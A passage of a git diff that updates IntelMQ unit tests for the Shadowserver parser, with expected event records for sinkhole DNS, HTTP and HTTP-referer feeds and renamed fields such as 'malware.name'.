-           'extra.destination.naics': 334111,
-           'extra.destination.sector': 'Information',
-           'extra.public_source': 'MSDCU',
-           'extra.source.naics': 541611,
-           'extra.source.sector': 'Communications, Service Provider, and Hosting Service',
-           'feed.name': 'ShadowServer Sinkhole',
-           'protocol.transport': 'tcp',
-           'source.asn': 8220,
-           'source.geolocation.cc': 'IE',
-           'source.geolocation.city': 'DUBLIN',
-           'source.geolocation.region': 'DUBLIN',
-           'source.ip': '217.173.3.4',
-           'source.port': 28940,
-           'time.source': '2021-03-04T00:00:00+00:00',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           },
-          {'__type': 'Event',
-           'classification.identifier': 'b68-zeroaccess-2-32bit',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8075,
-           'destination.geolocation.cc': 'HK',
-           'destination.geolocation.city': 'HONG KONG',
-           'destination.geolocation.region': 'HONG KONG',
-           'destination.ip': '168.63.5.6',
-           'destination.port': 16464,
-           'extra.destination.naics': 334111,
-           'extra.destination.sector': 'Information',
-           'extra.public_source': 'MSDCU',
-           'feed.name': 'ShadowServer Sinkhole',
-           'protocol.transport': 'tcp',
-           'source.asn': 6697,
-           'source.geolocation.cc': 'BY',
-           'source.geolocation.city': 'VITEBSK',
-           'source.geolocation.region': "VITEBSKAJA OBLAST'",
-           'source.ip': '37.212.5.6',
-           'source.port': 36735,
-           'time.source': '2021-03-04T00:00:00+00:00',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[3]])),
-           },
           ]
 
 
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole_dns.py b/intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole_dns.py
new file mode 100644
index 000000000..cf3bdb162
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole_dns.py
@@ -0,0 +1,127 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__), 'testdata/event4_sinkhole_dns.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {"feed.name": "Sinkhole DNS",
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2015-01-01T00:00:00+00:00",
+                  "extra.file_name": "2019-01-01-event4_sinkhole_dns-test-geo.csv",
+                  }
+
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'sinkholedns',
+   'extra.tag' : 'msexchange',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.count' : 1,
+   'extra.infection' : 'calypso',
+   'extra.dns_query' : 'YolkIsh.COM',
+   'extra.dns_query_type' : 'A',
+   'extra.naics' : 518210,
+   'extra.sector' : 'Communications, Service Provider, and Hosting Service',
+   'feed.name' : 'Sinkhole DNS',
+   'malware.name' : 'calypso',
+   'protocol.application' : 'dns',
+   'protocol.transport' : 'udp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'source.asn' : 8220,
+   'source.geolocation.cc' : 'DE',
+   'source.geolocation.city' : 'FRANKFURT AM MAIN',
+   'source.geolocation.region' : 'HESSEN',
+   'source.ip' : '217.110.0.0',
+   'source.port' : 29614,
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2022-01-06T00:00:02+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'sinkholedns',
+   'extra.tag' : 'rat',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.count' : 1,
+   'extra.infection' : 'orcus',
+   'extra.dns_query' : 'verble.rocks',
+   'extra.dns_query_type' : 'A',
+   'extra.naics' : 518210,
+   'feed.name' : 'Sinkhole DNS',
+   'malware.name' : 'orcus',
+   'protocol.application' : 'dns',
+   'protocol.transport' : 'udp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[2]])),
+   'source.asn' : 40934,
+   'source.geolocation.cc' : 'US',
+   'source.geolocation.city' : 'ASHBURN',
+   'source.geolocation.region' : 'VIRGINIA',
+   'source.ip' : '209.66.0.0',
+   'source.port' : 46189,
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2022-01-06T00:00:02+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'sinkholedns',
+   'extra.tag' : 'msexchange',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.count' : 1,
+   'extra.infection' : 'calypso',
+   'extra.dns_query' : 'RAwFuNS.COM',
+   'extra.dns_query_type' : 'A',
+   'extra.naics' : 518210,
+   'extra.sector' : 'Communications, Service Provider, and Hosting Service',
+   'feed.name' : 'Sinkhole DNS',
+   'malware.name' : 'calypso',
+   'protocol.application' : 'dns',
+   'protocol.transport' : 'udp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[3]])),
+   'source.asn' : 8220,
+   'source.geolocation.cc' : 'DE',
+   'source.geolocation.city' : 'FRANKFURT AM MAIN',
+   'source.geolocation.region' : 'HESSEN',
+   'source.ip' : '217.110.0.0',
+   'source.port' : 3590,
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2022-01-06T00:00:02+00:00'
+}
+]
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole_http.py b/intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole_http.py
index d694a49a6..60cd6b6ef 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole_http.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole_http.py
@@ -25,6 +25,7 @@
 EVENTS = [{'__type': 'Event',
            'feed.name': 'HTTP Sinkhole IPv4',
            'classification.identifier': 'avalanche-andromeda',
+           'extra.tag': 'avalanche-andromeda',
            'classification.taxonomy': 'malicious-code',
            'classification.type': 'infected-system',
            'destination.asn': 6939,
@@ -36,7 +37,7 @@
            'destination.port': 80,
            'extra.destination.naics': 518210,
            'extra.destination.sector': 'Communications, Service Provider, and Hosting Service',
-           'extra.family': 'andromeda',
+           'malware.name': 'andromeda',
            'protocol.application': 'http',
            'protocol.transport': 'tcp',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
@@ -52,6 +53,7 @@
           {'__type': 'Event',
            'feed.name': 'HTTP Sinkhole IPv4',
            'classification.identifier': 'avalanche-andromeda',
+           'extra.tag': 'avalanche-andromeda',
            'classification.taxonomy': 'malicious-code',
            'classification.type': 'infected-system',
            'destination.asn': 6939,
@@ -63,7 +65,7 @@
            'destination.port': 80,
            'extra.destination.naics': 518210,
            'extra.destination.sector': 'Communications, Service Provider, and Hosting Service',
-           'extra.family': 'andromeda',
+           'malware.name': 'andromeda',
            'extra.source.naics': 517311,
            'extra.source.sector': 'Communications, Service Provider, and Hosting Service',
            'protocol.application': 'http',
@@ -81,6 +83,7 @@
           {'__type': 'Event',
            'feed.name': 'HTTP Sinkhole IPv4',
            'classification.identifier': 'avalanche-andromeda',
+           'extra.tag': 'avalanche-andromeda',
            'classification.taxonomy': 'malicious-code',
            'classification.type': 'infected-system',
            'destination.asn': 6939,
@@ -93,7 +96,7 @@
            'extra.destination.naics': 518210,
            'extra.destination.sector': 'Communications, Service Provider, and Hosting Service',
            'extra.source.naics': 517311,
-           'extra.family': 'andromeda',
+           'malware.name': 'andromeda',
            'protocol.application': 'http',
            'protocol.transport': 'tcp',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
@@ -109,6 +112,7 @@
           {'__type': 'Event',
            'feed.name': 'HTTP Sinkhole IPv4',
            'classification.identifier': 'avalanche-andromeda',
+           'extra.tag': 'avalanche-andromeda',
            'classification.taxonomy': 'malicious-code',
            'classification.type': 'infected-system',
            'destination.asn': 6939,
@@ -121,7 +125,7 @@
            'extra.destination.naics': 518210,
            'extra.destination.sector': 'Communications, Service Provider, and Hosting Service',
            'extra.source.naics': 517311,
-           'extra.family': 'andromeda',
+           'malware.name': 'andromeda',
            'protocol.application': 'http',
            'protocol.transport': 'tcp',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
@@ -137,6 +141,7 @@
           {'__type': 'Event',
            'feed.name': 'HTTP Sinkhole IPv4',
            'classification.identifier': 'avalanche-andromeda',
+           'extra.tag': 'avalanche-andromeda',
            'classification.taxonomy': 'malicious-code',
            'classification.type': 'infected-system',
            'destination.asn': 6939,
@@ -148,7 +153,7 @@
            'destination.port': 80,
            'extra.destination.naics': 518210,
            'extra.destination.sector': 'Communications, Service Provider, and Hosting Service',
-           'extra.family': 'andromeda',
+           'malware.name': 'andromeda',
            'protocol.application': 'http',
            'protocol.transport': 'tcp',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole_http_referer.py b/intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole_http_referer.py
index 0e3e3cf8a..b1ccacd31 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole_http_referer.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole_http_referer.py
@@ -24,6 +24,7 @@
 EVENTS = [{'__type': 'Event',
            'feed.name': 'Sinkhole-Events-HTTP-Referer IPv4',
            'classification.identifier': 'sinkhole-http-referer',
+           'extra.tag': 'kovter',
            'classification.taxonomy': 'other',
            'classification.type': 'other',
            'destination.asn': 60781,
@@ -37,7 +38,7 @@
            'extra.destination.naics': 518210,
            'extra.destination.sector': 'Communications, Service Provider, and Hosting Service',
            'extra.event_id': '1614816002',
-           'extra.family': 'kovter',
+           'malware.name': 'kovter',
            'extra.http_referer': 'http://12106.mobapptrack.com/click/redirect?feed_id=12106&sub_id=7&q=8A5491983C8FBE7743E2D2C36E45EBC4-18307118D2626C9BD756B3F09D14BB910E381EE4',
            'extra.http_referer_asn': 28753,
            'extra.http_referer_city': 'FRANKFURT AM MAIN',
@@ -45,18 +46,18 @@
            'extra.http_referer_hostname': '12106.mobapptrack.com',
            'extra.http_referer_ip': '178.162.203.211',
            'extra.http_referer_naics': 518210,
-           'extra.http_referer_port': '80',
+           'extra.http_referer_port': 80,
            'extra.http_referer_region': 'HESSEN',
            'extra.http_referer_sector': 'Communications, Service Provider, and Hosting '
                                         'Service',
-           'extra.protocol': 'tcp',
-           'extra.tag': 'kovter',
+           'protocol.transport': 'tcp',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[1]])),
            'time.observation': '2015-01-01T00:00:00+00:00',
            'time.source': '2021-03-04T00:00:02+00:00'},
           {'__type': 'Event',
            'classification.identifier': 'sinkhole-http-referer',
+           'extra.tag': 'sunburst',
            'classification.taxonomy': 'other',
            'classification.type': 'other',
            'destination.asn': 28753,
@@ -71,26 +72,26 @@
                                        'Service',
            'destination.ip': '178.162.1.2',
            'extra.event_id': '1614816011',
-           'extra.family': 'sunburst',
+           'malware.name': 'sunburst',
            'extra.http_referer': 'http://x.noizm.com/jump.php?u=http://freescanonline.com/animalally.com',
            'extra.http_referer_asn': 9370,
            'extra.http_referer_city': 'OSAKA',
            'extra.http_referer_geo': 'JP',
            'extra.http_referer_hostname': 'x.noizm.com',
            'extra.http_referer_naics': 518210,
-           'extra.http_referer_port': '80',
+           'extra.http_referer_port': 80,
            'extra.http_referer_ip': '59.106.1.2',
            'extra.http_referer_region': 'OSAKA',
            'extra.http_referer_sector': 'Communications, Service Provider, and Hosting '
                                         'Service',
-           'extra.protocol': 'tcp',
-           'extra.tag': 'sunburst',
+           'protocol.transport': 'tcp',
            'feed.name': 'Sinkhole-Events-HTTP-Referer IPv4',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[2]])),
            'time.source': '2021-03-04T00:00:11+00:00'},
           {'__type': 'Event',
            'classification.identifier': 'sinkhole-http-referer',
+           'extra.tag': 'kovter',
            'classification.taxonomy': 'other',
            'classification.type': 'other',
            'destination.asn': 28753,
@@ -105,7 +106,7 @@
                                        'Service',
            'destination.ip': '178.162.1.2',
            'extra.event_id': '1614816012',
-           'extra.family': 'kovter',
+           'malware.name': 'kovter',
            'extra.http_referer': 'http://x.blogspot.com/',
            'extra.http_referer_ip': '142.250.3.4',
            'extra.http_referer_asn': 15169,
@@ -113,18 +114,18 @@
            'extra.http_referer_geo': 'US',
            'extra.http_referer_hostname': 'x.blogspot.com',
            'extra.http_referer_naics': 519130,
-           'extra.http_referer_port': '80',
+           'extra.http_referer_port': 80,
            'extra.http_referer_region': 'CALIFORNIA',
            'extra.http_referer_sector': 'Communications, Service Provider, and Hosting '
                                         'Service',
-           'extra.protocol': 'tcp',
-           'extra.tag': 'kovter',
+           'protocol.transport': 'tcp',
            'feed.name': 'Sinkhole-Events-HTTP-Referer IPv4',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[3]])),
            'time.source': '2021-03-04T00:00:12+00:00'},
           {'__type': 'Event',
            'classification.identifier': 'sinkhole-http-referer',
+           'extra.tag': 'sunburst',
            'classification.taxonomy': 'other',
            'classification.type': 'other',
            'destination.asn': 60781,
@@ -139,7 +140,7 @@
            'extra.destination.sector': 'Communications, Service Provider, and Hosting '
                                        'Service',
            'extra.event_id': '1614816013',
-           'extra.family': 'sunburst',
+           'malware.name': 'sunburst',
            'extra.http_referer': 'http://www.example.com/teams/default.asp?u=EKL&t=c&s=lacrosse&p=remote&url=http://freescanonline.com/personalationmall.com',
            'extra.http_referer_asn': 14618,
            'extra.http_referer_city': 'ASHBURN',
@@ -147,17 +148,17 @@
            'extra.http_referer_hostname': 'www.example.com',
            'extra.http_referer_ip': '34.232.5.6',
            'extra.http_referer_naics': 454110,
-           'extra.http_referer_port': '80',
+           'extra.http_referer_port': 80,
            'extra.http_referer_region': 'VIRGINIA',
            'extra.http_referer_sector': 'Retail Trade',
-           'extra.protocol': 'tcp',
-           'extra.tag': 'sunburst',
+           'protocol.transport': 'tcp',
            'feed.name': 'Sinkhole-Events-HTTP-Referer IPv4',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[4]])),
            'time.source': '2021-03-04T00:00:13+00:00'},
           {'__type': 'Event',
            'classification.identifier': 'sinkhole-http-referer',
+           'extra.tag': 'sunburst',
            'classification.taxonomy': 'other',
            'classification.type': 'other',
            'destination.asn': 60781,
@@ -172,7 +173,7 @@
                                        'Service',
            'destination.ip': '5.79.1.2',
            'extra.event_id': '1614816086',
-           'extra.family': 'sunburst',
+           'malware.name': 'sunburst',
            'extra.http_referer': 'http://x.communes.jp/?url=http://freescanonline.com/raftcomply.com',
            'extra.http_referer_asn': 2516,
            'extra.http_referer_city': 'SAPPORO',
@@ -180,12 +181,11 @@
            'extra.http_referer_hostname': 'x.communes.jp',
            'extra.http_referer_ip': '210.172.7.8',
            'extra.http_referer_naics': 517312,
-           'extra.http_referer_port': '80',
+           'extra.http_referer_port': 80,
            'extra.http_referer_region': 'HOKKAIDO',
            'extra.http_referer_sector': 'Communications, Service Provider, and Hosting '
                                         'Service',
-           'extra.protocol': 'tcp',
-           'extra.tag': 'sunburst',
+           'protocol.transport': 'tcp',
            'feed.name': 'Sinkhole-Events-HTTP-Referer IPv4',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[5]])),
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_event6_sinkhole_http.py b/intelmq/tests/bots/parsers/shadowserver/test_event6_sinkhole_http.py
new file mode 100644
index 000000000..d6ff35dc1
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_event6_sinkhole_http.py
@@ -0,0 +1,146 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__), 'testdata/event6_sinkhole_http.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {"feed.name": "Sinkhole-Events-HTTP IPv6",
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2010-02-10T00:00:00+00:00",
+                  "extra.file_name": "2010-02-10-event6_sinkhole_http-test-geo.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : '3ve',
+   'classification.taxonomy' : 'malicious-code',
+   'classification.type' : 'infected-system',
+   'destination.asn' : 6939,
+   'destination.fqdn' : 'devps.net',
+   'destination.geolocation.cc' : 'US',
+   'destination.geolocation.city' : 'FREMONT',
+   'destination.geolocation.region' : 'CALIFORNIA',
+   'destination.ip' : '2001:470:1:332::fe',
+   'destination.port' : 80,
+   'destination.url' : 'http://devps.net/QKMSvF2hl11j%2fbMkyPbF5EpHYhd6VWTG4u19K3Rt7JGU3lMYRqpq8wPYEuOGKKeidKW3pefVfKSjBnL0cXizZbmuWWu8AQNRqw5g9Ny5vZtiv638XKoWwCLuUOTISTV%2fLcpcS1%2f22NjWqgXkHGISAuyVtafqyCC%2f5cA0eYg9Me8VzAIFDdTArogQOdYhElf2xluhEFPsstGQ%2bwrM4VmKHJpzyjD7Y%2fN%2bQV3wnZNdVkEVk1k2iKBJkotYv3ajgYWr56xxCbY5vE1IpZBRNhhaUDNZo0kJgi%2b6knXZ4m7JHt%2fGtJeP%2bNTxHSUL2ELlTIiT3ENlPYD6FdH6ZBxT1OneW%2f0ih%2fcN7vctb5B5Qwa1ez7ZjN2QxgBYkFDDHHTs42ej5eF2BysWAQDSUr%2fcySyGxcfPveIpfQEdrynGKR6z3OYqkFnP%2bYRDQp2rt1qt0FwCB4L9cg05TQlSSTJVGfPDrtcqjvKY4c9hWwSHtE8jMRpeCYO4Es%2bWgwr5DjzMicmuZo%2f4Ycr16jpN7xlDJdJ8iCFZxbSGgVC7ksVlGE8wlfWPI4KTuX5U5s61eNWPTlAC%2fOGb8grtw%2ffzizoIX9D6ZUMvslGLQIp%2fvNmNQkZy8HhNoV6Lns%2figITP%2fpN0H8h9HjUTl9qn65xFOEVpc0motSy8alcTPtTRKq5Jvc4Ao0x3N%2fvCB1v4Epx7XC0UpFbw8TrYEvAczEfGsGM',
+   'extra.destination.naics' : 518210,
+   'extra.destination.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.http_agent' : 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)',
+   'extra.infection' : 'boaxxe',
+   'extra.tag' : '3ve',
+   'feed.name' : 'Sinkhole-Events-HTTP IPv6',
+   'malware.name' : 'boaxxe',
+   'protocol.application' : 'http',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 7713,
+   'source.geolocation.cc' : 'ID',
+   'source.geolocation.city' : 'JAKARTA',
+   'source.geolocation.region' : 'JAKARTA RAYA',
+   'source.ip' : '2001:448a:1082:4d9b:7491:bf9e:3d5f:a634',
+   'source.port' : 49431,
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2022-03-02T09:14:19+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : '3ve',
+   'classification.taxonomy' : 'malicious-code',
+   'classification.type' : 'infected-system',
+   'destination.asn' : 6939,
+   'destination.fqdn' : 'devps.net',
+   'destination.geolocation.cc' : 'US',
+   'destination.geolocation.city' : 'FREMONT',
+   'destination.geolocation.region' : 'CALIFORNIA',
+   'destination.ip' : '2001:470:1:332::ef',
+   'destination.port' : 80,
+   'destination.url' : 'http://devps.net/QKMSvF2hl11j%2fbMkyPbF5EpHYhd6VWTG4u19K3Rt7JGU3lMYRqpq8wPYEuOGKKeidKW3pefVfKSjBnL0cXizZbmuWWu8AQNRqw5g9Ny5vZtiv638XKoWwCLuUOTISTV%2fLcpcS1%2f22NjWqgXkHGISAuyVtafqyCC%2f5cA0eYg9Me8VzAIFDdTArogQOdYhElf2xluhEFPsstGQ%2bwrM4VmKHJpzyjD7Y%2fN%2bQV3wnZNdVkEVk1k2iKBJkotYv3ajgYWr56xxCbY5vE1IpZBRNhhaUDNZo0kJgi%2b6knXZ4m7JHt%2fGtJeP%2bNTxHSUL2ELlTIiT3ENlPYD6FdH6ZBxT1OneW%2f0ih%2fcN7vctb5B5Qwa1ez7ZjN2QxgBYkFDDHHTs42ej5eF2BysWAQDSUr%2fcySyGxcfPveIpfQEdrynGKR6z3OYqkFnP%2bYRDQp2rt1qt0FwCB4L9cg05TQlSSTJVGfPDrtcqjvKY4c9hWwSHtE8jMRpeCYO4Es%2bWgwr5DjzMicmuZo%2f4Ycr16jpN7xlDJdJ8iCFZxbSGgVC7ksVlGE8wlfWPI4KTuX5U5s61eNWPTlAC%2fOGb8grtw%2ffzizoIX9D6ZUMvslGLQIp%2fvNmNQkZy8HhNoV6Lns%2figITP%2fpN0H8h9HjUTl9qn65xFOEVpc0motSy8alcTPtTRKq5Jvc4Ao0x3N%2fvCB1v4Epx7XC0UpFbw8TrYEvAczEfGsGM',
+   'extra.destination.naics' : 518210,
+   'extra.destination.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.http_agent' : 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)',
+   'extra.infection' : 'boaxxe',
+   'extra.tag' : '3ve',
+   'feed.name' : 'Sinkhole-Events-HTTP IPv6',
+   'malware.name' : 'boaxxe',
+   'protocol.application' : 'http',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 7713,
+   'source.geolocation.cc' : 'ID',
+   'source.geolocation.city' : 'JAKARTA',
+   'source.geolocation.region' : 'JAKARTA RAYA',
+   'source.ip' : '2001:448a:1082:4d9b:7491:bf9e:3d5f:a634',
+   'source.port' : 49460,
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2022-03-02T09:15:10+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : '3ve',
+   'classification.taxonomy' : 'malicious-code',
+   'classification.type' : 'infected-system',
+   'destination.asn' : 6939,
+   'destination.fqdn' : 'devps.net',
+   'destination.geolocation.cc' : 'US',
+   'destination.geolocation.city' : 'FREMONT',
+   'destination.geolocation.region' : 'CALIFORNIA',
+   'destination.ip' : '2001:470:1:332::fe',
+   'destination.port' : 80,
+   'destination.url' : 'http://devps.net/WMoUNCvuKGzdqSCeQcadP1%2f0B%2f3bzpOmyKBU85Z25HVOhvDQUPFl%2fk8uOcLewS%2b1BsuHXalRAOIgGOYYs2igj6UX8FkdCAmDewWPvfDhPD45nwd2tx1lLf2IoIfuOtIpGR6bN5Q6hGpSBgfERqCa0ImHcwfcZ2EdO%2fWvg7R8H6SLcTiuUC0I4pzvlWt1CRLgLdIEU1hZ0nnFHIHhchb6D7ITEgBQ2chQDxy5TJMrGjm4Dac6dKl%2ft5uYhRhSjAHkLLtgrJjsqVtVbelTAkt5kdcqLlO09m1SH%2fvtAb%2fOvR2DbhBss7%2f64DG7g6cAnghNA6JrFn1uW7sw%2bnKH8koKQwzUjdSsbrQAvmg4r0KDDW8Diq64gfDzxFWkzCLOYifc%2fwlinXPCl7aJiNCoieDC1U98RNQg%2f5td4SZmJnDQ2%2f96CPbFeSpCez5WD1rCjrxLj1h2cqzIgkydEWACceWP9ztxc4QaObzEcgOGxbRckWC7H2aaLeT8jaYEYdKi1pwEKChSL3YdEt4ZIb2IFrWwzNaXEpQzFXf07f902OEdI9vVA1ZdEOBPG6rAIkzMdebfprfVyhKEWtrCd3Skg3COUFtRQks5jzG1nv4sVGijTfSgyn6xE9Taka668Nycik6nmHy8Huj3oC01j3tee%2f1Z3eI6tV7lgM5d3uFJ84slRGHUCwMfVozOGmZRwNo%2fz%2bA',
+   'extra.destination.naics' : 518210,
+   'extra.destination.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.http_agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
+   'extra.infection' : 'boaxxe',
+   'extra.source.naics' : 517311,
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.tag' : '3ve',
+   'feed.name' : 'Sinkhole-Events-HTTP IPv6',
+   'malware.name' : 'boaxxe',
+   'protocol.application' : 'http',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 11427,
+   'source.geolocation.cc' : 'US',
+   'source.geolocation.city' : 'GARLAND',
+   'source.geolocation.region' : 'TEXAS',
+   'source.ip' : '2603:8080:b20a:dc00:f06e:8304:71f6:27e2',
+   'source.port' : 62932,
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2022-03-02T14:15:10+00:00'
+}
+          ]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_honeypot_brute_force.py b/intelmq/tests/bots/parsers/shadowserver/test_honeypot_brute_force.py
index 26334ede8..3ca88111f 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_honeypot_brute_force.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_honeypot_brute_force.py
@@ -22,6 +22,7 @@
                   "extra.file_name": "2019-01-01-event4_honeypot_brute_force.csv"
                   }
 EVENTS = [{'__type': 'Event',
+           'classification.identifier': 'ssh',
            'classification.taxonomy': 'intrusion-attempts',
            'classification.type': 'brute-force',
            'extra.client_version': "b'SSH-2.0-Go'",
@@ -32,7 +33,7 @@
            'destination.ip': '162.250.1.2',
            'destination.port': 22,
            'extra.application': 'ssh',
-           'extra.end_time': '2021-03-27T00:00:01.710968+00:00',
+           'extra.end_time': '2021-03-27T00:00:01.710968Z',
            'extra.public_source': 'CAPRICA-EU',
            'extra.start_time': '2021-03-27T00:00:00.521730Z',
            'malware.name': 'ssh-brute-force',
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_hp_http_scan.py b/intelmq/tests/bots/parsers/shadowserver/test_hp_http_scan.py
deleted file mode 100644
index 49f6b7c90..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/test_hp_http_scan.py
+++ /dev/null
@@ -1,119 +0,0 @@
-# SPDX-FileCopyrightText: 2019 Sebastian Wagner
-#
-# SPDX-License-Identifier: AGPL-3.0-or-later
-
-# -*- coding: utf-8 -*-
-
-import os
-import unittest
-
-import intelmq.lib.test as test
-import intelmq.lib.utils as utils
-from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
-
-with open(os.path.join(os.path.dirname(__file__), 'testdata/hp_http_scan.csv')) as handle:
-    EXAMPLE_FILE = handle.read()
-EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
-
-EXAMPLE_REPORT = {"feed.name": "ShadowServer HTTP-Scanners",
-                  "raw": utils.base64_encode(EXAMPLE_FILE),
-                  "__type": "Report",
-                  "time.observation": "2019-01-01T00:00:00+00:00",
-                  "extra.file_name": "2019-01-01-hp_http_scan-test-geo.csv",
-                  }
-EVENTS = [{'__type': 'Event',
-           'feed.name': 'ShadowServer HTTP-Scanners',
-           'feed.name': 'ShadowServer HTTP-Scanners',
-           'classification.identifier': 'http',
-           'classification.taxonomy': 'information-gathering',
-           'classification.type': 'scanner',
-           'protocol.application': 'http',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           'time.observation': '2019-01-01T00:00:00+00:00',
